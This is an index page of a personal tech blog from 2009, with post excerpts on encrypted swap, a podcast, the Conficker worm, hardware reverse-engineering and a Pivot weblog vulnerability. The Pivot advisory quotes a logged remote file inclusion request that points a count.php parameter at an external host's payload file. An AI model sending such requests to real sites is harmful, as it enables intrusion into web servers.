1. Setting up encrypted swap.

    12 April 2009

    As computers go these days, it is not unusual for the amount of free RAM to reach a critical level at which no other processes will fit into what little unused memory is left. Modern operating systems will then start swapping pages of memory to disk to make room; the data can be read back in later if necessary. This is a procedure called swapping, and it can take several forms. Windows maintains a large hidden file somewhere on the drive (usually in the root directory of C:) which it uses for this purpose. Linux, UNIX, and UNIX-alikes most often …

    Read more...

  2. Coming soon: Tales of the Afternow season 3

    09 April 2009

    A couple of years ago, I don't remember exactly when or how, I stumbled across an unusual podcast called Tales From the Afternow from Rant Media. I suppose that it's more accurate to call it an audio drama rather than an audiobook because it's not talk radio as we usually think of it, nor is it a performance of a novel. The world described in these stories is a bleak one set on a post-nuclear war, post hyper-corporatization Earth in which licenses are required to read or write, languages and information are considered dangerous weapons, and even Time itself is …

    Read more...

  3. I'm here today with absolutely nothing to talk about.. and that's what I want to talk to you about.

    05 April 2009

    Still not dead. Still not sleeping, either.

    Work has been keeping me busy lately, but thankfully not due to a certain beastie that was supposed to go off last week. Conflicker.C appears to have been something of a damp squib, and I for one am grateful. I'm not terribly surprised that it didn't bring about The End of the Net as we Know It. Hyperbole and RPG references aside, packing an out-of-date exploit as a primary vector of infection coupled with samples of the Conflicker.C binary itself winding up in the hands of practically every antivirus researcher on …

    Read more...

  4. Conflicker information and links - distribute widely!

    31 March 2009

    As you have probably heard on the news a new beastie has been making its rounds on the Net, infiltrating Windows machines and awaiting the coming of the first of April - April Fool's Day. Unfortunately, like Y2k and the Michaelangelo virus, there is an incredible amount of misinformation out there making this worm out to be The End of the Net As We Know It - to hear some of the chatterbots talking heads, the milk in your fridge could curdle and your cat will marry your dog if your workstation gets infected. To be fair, nobody's sure of what Conflicker …

    Read more...

  5. More random thoughts.

    30 March 2009

    Techniques simply don't exist until someone with several sets of letters after their name gave them polysyllablic names, wrote a whitepaper, and posted about it to the corporate blog.

    The nicer the building, the nastier the bathrooms get.

    Read more...

  6. Lost weeks.

    30 March 2009

    I haven't been posting lately due to the fact Real Life (tm) has been keeping me away from the Net and generally too busy to write about what's been going on. Two weekends ago Lyssa and I spent the weekend with Solo of the Lost Boys and Shimizu, the latter of whom was in town for a couple of weeks. No one's seen any of the Lost Boys for a few months, so we jumped at the chance to hang out and talk shop for a couple of days. We spent much of that weekend running around northern Virginia, discussing …

    Read more...

  7. Remotely exploitable vulnerability found in Pivot v1.40.6!

    19 March 2009

    Attention all users of the Pivot weblog package! A remotely exploitable vulnerability was discovered in the /web/content/extensions/bbclone_tools/count.php file. This vulnerability can be used by an attacker to delete files from your web content directory, and if the register_globals PHP variable is set, it can be used to stage a remote file inclusion attack. One person (I'll blank their IP address) has already tried it on my website:

    a.b.c.d - - [19/Mar/2009:17:19:22 -0400] "GET //extensions/bbclone_tools/count.php?refkey=http://www.infernodancevault.com//modules/tinycontent/admin/chmod.txt?? HTTP/1 …

    Read more...

  8. OCZ Neural Impulse Actuator notes and roll-up post.

    18 March 2009

    While reading the files in /usr/src/linux/Documentation/usb/ I got it in my head to see if anyone else had spent any time reverse engineering the OCZ NIA, or at least had figured out how to get output from it. I spent some time a couple of days ago playing with it on Windbringer (running Gentoo Linux and all I was able to determine in the short time I worked on it was that it successfully registers itself with the Linux kernel's USB subsystem as an USB Human Interface Device (heh). After collecting some information I put the …

    Read more...

122 / 207